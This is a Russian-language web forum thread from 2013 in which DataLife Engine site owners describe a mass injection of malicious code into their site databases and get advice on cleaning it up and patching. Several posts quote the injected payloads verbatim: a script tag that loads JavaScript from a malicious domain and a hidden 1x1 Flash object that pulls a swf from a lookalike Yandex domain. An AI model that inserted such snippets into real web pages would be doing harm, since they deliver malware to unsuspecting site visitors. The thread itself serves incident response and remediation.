Stepller 0 Опубликовано: 9 сентября 2013 Рассказать Опубликовано: 9 сентября 2013 Всем привет, в общем такая бяка, все новостные а также статические страницы оказались с вредоностным кодом, каким образом он залетел ума не приложу. Сайт уже 2-ой, год никаких именений не проводилось, Видимо какая то новая брешь в движке. Вирусня судя по зарегистрированным доменам вот-вот вышла на просторы. Вот сам скрипт : <script async="async" type="text/javascript" src="http://9yermfnl0i.ru/6516413452e79f3f415bd25c5c37cd19.js?in"></script> Прописался в конце кода. Просьба разобраться, а то оказался во всех черных списках браузеров. Спасибо.Версия DataLife Engine: 10.0 Тип лицензии скрипта: Лицензия активирована Операционная система: FreeBSD 8.3-RELEASE-p3 Версия PHP: 5.2.17 Версия MySQL: 5.1.63-log MySQLi Информация о GD: GD Version: bundled (2.0.34 compatible), FreeType Support: Enabled, FreeType Linkage: with freetype, T1Lib Support: Enabled, GIF Read Support: Enabled, GIF Create Support: Enabled, JPG Support: Enabled, PNG Support: Enabled, WBMP Support: Enabled, XPM Support: Disabled, XBM Support: Enabled, JIS-mapped Japanese Font Support: Disabled, Module mod_rewrite Неопределено Безопасный режим: Выключен Выделено оперативной памяти: 128M Отключенные функции: Неопределено Максимальный размер загружаемого файла: 32 Mb Размер свободного места на диске: 90,78 Gb Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 076 Опубликовано: 9 сентября 2013 Рассказать Опубликовано: 9 сентября 2013 Всем привет, в общем такая бяка, все новостные а также статические страницы оказались с вредоностным кодом, каким образом он залетел ума не приложу. Это делалось не через скрипт, а злоумышленник имел прямой доступ к вашей БД, минуя DLE. Добавить JS в новость, через DLE невозможно в принципе. Ищите брешь в безопасности серверного ПО. Чтобы удалить весь JS код из новостей, вам нужно в админпанели сделать перестроение публикаций, DLE автоматом удалит этот код, а из статических страниц удалять нужно уже вручную. 1 Цитата Ссылка на сообщение Поделиться на других сайтах
Stepller 0 Опубликовано: 9 сентября 2013 Рассказать Опубликовано: 9 сентября 2013 Автор Всем привет, в общем такая бяка, все новостные а также статические страницы оказались с вредоностным кодом, каким образом он залетел ума не приложу. Это делалось не через скрипт, а злоумышленник имел прямой доступ к вашей БД, минуя DLE. Добавить JS в новость, через DLE невозможно в принципе. Ищите брешь в безопасности серверного ПО. Чтобы удалить весь JS код из новостей, вам нужно в админпанели сделать перестроение публикаций, DLE автоматом удалит этот код, а из статических страниц удалять нужно уже вручную. Как я правильно понял, это мне надо писать в саппорт хостниг-центра? БД у них крутится. Спасибо за совет, в следующий раз воспользуюсь вашим способом, а то я удалил путем выгрузки таблицы новостей и статики, тупо через замену в блокноте. Движений конечно больше)) Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 076 Опубликовано: 9 сентября 2013 Рассказать Опубликовано: 9 сентября 2013 Как я правильно понял, это мне надо писать в саппорт хостниг-центра? БД у них крутится. Скорее всего вы получите стандартный ответ: "У нас все в порядке, ищите уязвимости в своих скриптах", этот ответ приходит от хостингов в 99,9% случаях, они не занимаются проблемами пользователей пока им явно не укажешь в чем например баг, если он таковой есть, потому как самое частное и основное это банальное воровство доступов с компьютера пользователя. Я бы вам порекомендовал проверить и убедится в том что на вашем сайте нет посторонних скриптов, восстановить на всякий случай все файлы скрипта на оригинальные из архива дистрибутива. Сменить обязательно все пароли, в том числе и к БД и по FTP и вообще ко всему. Проверить свой комьютер на наличие вирусов и троянов, и не хранить доступы на своем комьютере, очень часто что их воруют именно с компьютера пользователя. 2 Цитата Ссылка на сообщение Поделиться на других сайтах
Stepller 0 Опубликовано: 9 сентября 2013 Рассказать Опубликовано: 9 сентября 2013 (изменено) Автор Скорее всего вы получите стандартный ответ: "У нас все в порядке, ищите уязвимости в своих скриптах", этот ответ приходит от хостингов в 99,9% случаях, они не занимаются проблемами пользователей пока им явно не укажешь в чем например баг, если он таковой есть, потому как самое частное и основное это банальное воровство доступов с компьютера пользователя. Я бы вам порекомендовал проверить и убедится в том что на вашем сайте нет посторонних скриптов, восстановить на всякий случай все файлы скрипта на оригинальные из архива дистрибутива. Сменить обязательно все пароли, в том числе и к БД и по FTP и вообще ко всему. Проверить свой комьютер на наличие вирусов и троянов, и не хранить доступы на своем комьютере, очень часто что их воруют именно с компьютера пользователя. Такой ответ я и получил))) Порекомендовали тоже самое что и Вы. Вирусов однозначно нет, т.к. за этим делом слежу. Хорошо буду разбиратся. Просто на самом деле смутили именно регистрация вирусных доменов и время атаки, они совпадают, я и предположил что это массовая атака. Сомневаюсь что кто-то ради моего сайта затеял подобную атаку. Огоромное спасибо за развернутый ответ. Изменено 9 сентября 2013 пользователем Stepller Цитата Ссылка на сообщение Поделиться на других сайтах
Stepller 0 Опубликовано: 9 сентября 2013 Рассказать Опубликовано: 9 сентября 2013 Автор Чую связь с атаками на http://10russia.ru/ Цитата Ссылка на сообщение Поделиться на других сайтах
R50 0 Опубликовано: 9 сентября 2013 Рассказать Опубликовано: 9 сентября 2013 Аналогично. Были заражены 2 сайта таким же вирусом, Гугл и Яндекс забанили моментально, что помогло сразу пресечь распространение. Сервер собственный, была оплачена услуга по выявлению проблемы и поиска бреши, результат нулевой - с сервером и его безопасностью все в порядке. Еще забавное совпадение, на сервере 11 сайтов и заражены были только два из них, которые имели ДЛЕ 10 версии. Цитата Ссылка на сообщение Поделиться на других сайтах
zimka 1 Опубликовано: 9 сентября 2013 Рассказать Опубликовано: 9 сентября 2013 9,8 тоже такая беда более ранние версии не тронуты....так что это массово сделано было.... и главное следов ни каких ни где ..... Цитата Ссылка на сообщение Поделиться на других сайтах
angarsk3 0 Опубликовано: 9 сентября 2013 Рассказать Опубликовано: 9 сентября 2013 Аналогично DLE 9.8 сейчас думаю заменить все на дефолтные файлы и сделать чистку может и поможет. Нужна оригинальная dle 9.8 а то у меня лицензия кончилась на ней и еще не продлял Цитата Ссылка на сообщение Поделиться на других сайтах
Stepller 0 Опубликовано: 10 сентября 2013 Рассказать Опубликовано: 10 сентября 2013 Автор Ну значит проблема не в бреши безопасности ПО. У меня модификаций на DLE вообще нет, кроме форума LB, это я про то надо ли заменять на дефолтные файлы сайта. Как я понимаю это была единичная акция по заражению - подготовке наших сайтов к атаке) Цитата Ссылка на сообщение Поделиться на других сайтах
zimka 1 Опубликовано: 10 сентября 2013 Рассказать Опубликовано: 10 сентября 2013 у меня на 9.8 без каких либо модификаций и изменений.... +еще вижу у некоторых такая же шляпа.... Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 076 Опубликовано: 10 сентября 2013 Рассказать Опубликовано: 10 сентября 2013 У всех у кого именно такая проблема как описано выше, то это прямой доступ к БД, минуя DLE. Во первых смотрите, стоял ли у вас у всех патч http://dle-news.ru/b...ule-minify.html ? Эта проблема в теории может прочитать данные доступа к БД, работает далеко не везде, плюс нужен как минимум доступ к управлению БД, например к phpMyAdmin минуя панели авторизации хостинга, или например вы использовали одинаковые пароли что для хостинга, что для БД. Патч ставить нужно в любом случае обязательно независимо ни от чего. Если патч уже стоял, то проблема в украденных другим способом доступа к БД. Цитата Ссылка на сообщение Поделиться на других сайтах
zimka 1 Опубликовано: 10 сентября 2013 Рассказать Опубликовано: 10 сентября 2013 ну хз хз у меня пароли везде разные... одинаковых нет... с компа украсть не реально.. потому как их тоже там нет... Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 076 Опубликовано: 10 сентября 2013 Рассказать Опубликовано: 10 сентября 2013 ну хз хз у меня пароли везде разные... одинаковых нет... с компа украсть не реально.. потому как их тоже там нет... так что это массово сделано было.... и главное следов ни каких ни где ..... Это один прямой запрос в БД, весь вопрос только в том откуда он был сделан. Следы есть всегда, главное знать где искать. Итак патч у вас стоял или нет, вы не ответили? У вас есть доступ к логам кто заходил в phpMyAdmin на сервере, если есть посмотрите было ли обращение к нему со сторонних IP адресов. Дополнено: что касается вашего сайта у вас вообще беда полная, у вас phpMyAdmin в открытом доступе по адресу https://вашсайт.ru/myadmin/ плюс стоит старая уязвимая версия, вам вообще шелл можно заливать и взламывать без проблем, даже не зная паролей. Обновляйте незамедлительно, закрывайте и меняйте путь к нему. Цитата Ссылка на сообщение Поделиться на других сайтах
zimka 1 Опубликовано: 10 сентября 2013 Рассказать Опубликовано: 10 сентября 2013 ну хз хз у меня пароли везде разные... одинаковых нет... с компа украсть не реально.. потому как их тоже там нет... так что это массово сделано было.... и главное следов ни каких ни где ..... Это один прямой запрос в БД, весь вопрос только в том откуда он был сделан. Следы есть всегда, главное знать где искать. Итак патч у вас стоял или нет, вы не ответили? У вас есть доступ к логам кто заходил в phpMyAdmin на сервере, если есть посмотрите было ли обращение к нему со сторонних IP адресов. Дополнено: что касается вашего сайта у вас вообще беда полная, у вас phpMyAdmin в открытом доступе по адресу https://вашсайт.ru/myadmin/ плюс стоит старая уязвимая версия, вам вообще шелл можно заливать и взламывать без проблем, даже не зная паролей. Обновляйте незамедлительно, закрывайте и меняйте путь к нему. нет патч не стоял... я не видел его...и не увидел бы если сегодня не показали Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 076 Опубликовано: 10 сентября 2013 Рассказать Опубликовано: 10 сентября 2013 zimka, Тогда это может быть причиной вашей проблемы, с учетом открытого входа в phpMyAdmin. Цитата Ссылка на сообщение Поделиться на других сайтах
wladimirdead 0 Опубликовано: 11 сентября 2013 Рассказать Опубликовано: 11 сентября 2013 (изменено) Данные от БД были угнаны именно из dbconfig.php. У меня подобная проблема была (фикс не стоял), так в папке enginecachesystem были обнаружены два файла с идентичным содержанием данных из dbconfig.php я их удалил, поставил фикс, поменял пароли, пока всё тихо PS. у человека не поставившего фикс или не поменявшего пароли от БД (не знаю что точно), был повторно внедрён код БД новостей и статестических страниц только уже не много друго содержания Изменено 11 сентября 2013 пользователем wladimirdead Цитата Ссылка на сообщение Поделиться на других сайтах
rifler 1 Опубликовано: 11 сентября 2013 Рассказать Опубликовано: 11 сентября 2013 Подскажите запрос в mysql чтобы вычистить все это добро. Нашел такое: UPDATE имя базы SET name = REPLACE(name, ' ', '-') Что писать в имя базы, чтобы вырезать все? Цитата Ссылка на сообщение Поделиться на других сайтах
neapol 5 Опубликовано: 11 сентября 2013 Рассказать Опубликовано: 11 сентября 2013 да , мне тоже заражали сайт. Вопрос был решён путём замены пароли хостинга на 20 и значный, проблема ушла. А ещё лучше смс - авторизация хостинга. тогда сайт защищён. Спасибки за скрипт, надо закинуть нужным людям Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 076 Опубликовано: 12 сентября 2013 Рассказать Опубликовано: 12 сентября 2013 rifler, Не нужно делать запросов, зайдите в админпанели в раздел "Перестроение публикаций" и сделайте в нем перестроение новостей. DLE сам удалит скрипты из новостей. Цитата Ссылка на сообщение Поделиться на других сайтах
mmmmm1501 0 Опубликовано: 12 сентября 2013 Рассказать Опубликовано: 12 сентября 2013 Здравствуйте. Также во всех новостях вчера появился код: <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="1" height="1"><param name="movie" value="http://webmasters-yandex.ru/flash.swf?704497470" /><param name="quality" value="high" /><param name="scale" value="exactfit" /><param name="bgcolor" value="#FFFFFF" /><param name="AllowScriptAccess" value="always" /><embed src="http://webmasters-yandex.ru/flash.swf?106593817" width="1" height="1" type="application/x-shockwave-flash" allowscriptaccess="always" pluginspage="http://www.macromedia.com/go/getflashplayer"></embed></object>[/CODE] В конце также стоял js, его убрал с помощью перестроений (спасибо админам за чудесный совет), а вот object classid через поиск и замену.. Да, я пропустил это обновление: http://dle-news.ru/bags/v10/1580-potencialnaya-ugroza-v-module-minify.html Сейчас и на др. сайте поменять нужно. Так что исправляйте народ, благо делается это быстро Цитата Ссылка на сообщение Поделиться на других сайтах
mmmmm1501 0 Опубликовано: 12 сентября 2013 Рассказать Опубликовано: 12 сентября 2013 (изменено) кхм. поиск и замена удаляет не всё 1. <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="1" height="1"><param name="movie" value="http://webmasters-yandex.ru/flash.swf?63115695" /><param name="quality" value="high" /><param name="scale" value="exactfit" /><param name="bgcolor" value="#FFFFFF" /><param name="AllowScriptAccess" value="always" /><embed src="http://webmasters-yandex.ru/flash.swf?380838547" width="1" height="1" type="application/x-shockwave-flash" allowscriptaccess="always" pluginspage="http://www.macromedia.com/go/getflashplayer"></embed></object> 2. <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="1" height="1"><param name="movie" value="http://webmasters-yandex.ru/flash.swf?1223934431...... кто вкурсе, как это быстро всё убрать? а то 11к новостей устану перебирать Изменено 12 сентября 2013 пользователем mmmmm1501 Цитата Ссылка на сообщение Поделиться на других сайтах
Jiihuda 0 Опубликовано: 13 сентября 2013 Рассказать Опубликовано: 13 сентября 2013 Да, как убрать? Цитата Ссылка на сообщение Поделиться на других сайтах
RedBaron 0 Опубликовано: 13 сентября 2013 Рассказать Опубликовано: 13 сентября 2013 (изменено) Добрый день! Та же самая фигня с вирусом уже неделю с ней занимаюсь. версия ДЛЕ 9.6... Сейчас попробовал ваш совет... Кстати проверил встроенным типа антивирусником от дле который определяет инородные файлы... Вот что определяет антивирусная программа Jiangmin Trojan/AndroidOS.afcr Это с админки прилагается... Обнаружены следующие подозрительные файлы: Имя файла: Размер: Дата: ./backup/backup/.htaccess 31 b 30.05.2013 11:18:43 неизвестен дистрибутиву ./engine/editor/jscripts/tiny_mce/plugins/spellchecker/config.php 758 b 30.05.2013 11:18:44 неизвестен дистрибутиву ./engine/editor/jscripts/tiny_mce/plugins/spellchecker/rpc.php 2,94 Kb 30.05.2013 11:18:44 неизвестен дистрибутиву ./engine/editor/jscripts/tiny_mce/plugins/spellchecker/classes/utils/Logger.php 5,6 Kb 30.05.2013 11:18:44 неизвестен дистрибутиву ./engine/editor/jscripts/tiny_mce/plugins/spellchecker/classes/utils/JSON.php 11,6 Kb 30.05.2013 11:18:44 неизвестен дистрибутиву ./engine/editor/jscripts/tiny_mce/plugins/spellchecker/classes/PSpellShell.php 2,88 Kb 30.05.2013 11:18:44 неизвестен дистрибутиву ./engine/editor/jscripts/tiny_mce/plugins/spellchecker/classes/PSpell.php 1,93 Kb 30.05.2013 11:18:44 неизвестен дистрибутиву ./engine/editor/jscripts/tiny_mce/plugins/spellchecker/classes/SpellChecker.php 1,51 Kb 30.05.2013 11:18:44 неизвестен дистрибутиву ./engine/editor/jscripts/tiny_mce/plugins/spellchecker/classes/GoogleSpell.php 3,15 Kb 30.05.2013 11:18:44 неизвестен дистрибутиву ./engine/editor/jscripts/tiny_mce/plugins/spellchecker/classes/EnchantSpell.php 1,67 Kb 30.05.2013 11:18:44 неизвестен дистрибутиву ./engine/editor/jscripts/tiny_mce/plugins/spellchecker/includes/general.php 2,23 Kb 30.05.2013 11:18:44 неизвестен дистрибутиву ./engine/editor/jscripts/tiny_mce/plugins/typograf/typographus.php 13,34 Kb 30.05.2013 11:18:44 неизвестен дистрибутиву ./engine/editor/jscripts/tiny_mce/plugins/typograf/handler.php 1,75 Kb 30.05.2013 11:18:44 неизвестен дистрибутиву ./engine/editor/jscripts/tiny_mce/plugins/emotions/emotions.php 2,25 Kb 30.05.2013 11:18:44 неизвестен дистрибутиву ./engine/editor/jscripts/tiny_mce/tiny_mce_gzip.php 10,28 Kb 30.05.2013 11:18:44 неизвестен дистрибутиву ./engine/modules/imagepreview.php 2,48 Kb 30.05.2013 11:18:46 неизвестен дистрибутиву ./engine/images.php 3,59 Kb 30.05.2013 11:18:43 неизвестен дистрибутиву ./language/language/.htaccess 33 b 30.05.2013 11:18:47 неизвестен дистрибутиву ./phpinfo.php 20 b 30.05.2013 11:18:43 неизвестен дистрибутиву Я так подозреваю, что там идет задвоение некоторых файлов и папок... Но может это не так... PS/ Все обновления скрипта по безопасности были сделаны своевременно... Последнее обновление установил сегодня, как только увидел его в админке. Изменено 13 сентября 2013 пользователем RedBaron Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 076 Опубликовано: 13 сентября 2013 Рассказать Опубликовано: 13 сентября 2013 mmmmm1501, Jiihuda, В данном случае нужно сделать бекап БД, открыть его в любом текстовом редакторе, например Notepad++ и провести поиск и замену в нем, в бекапе формат немного отличается, поэтому найдите сначала нужный код например по домену. Я так подозреваю, что там идет задвоение некоторых файлов и папок... Но может это не так... Часть файлов у вас от старых версий скрипта, часть от некорректного копирования файлов дистрибутива. Все что говорит антивирус можно удалить. Цитата Ссылка на сообщение Поделиться на других сайтах
Рекомендованные сообщения
Присоединяйтесь к обсуждению
Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.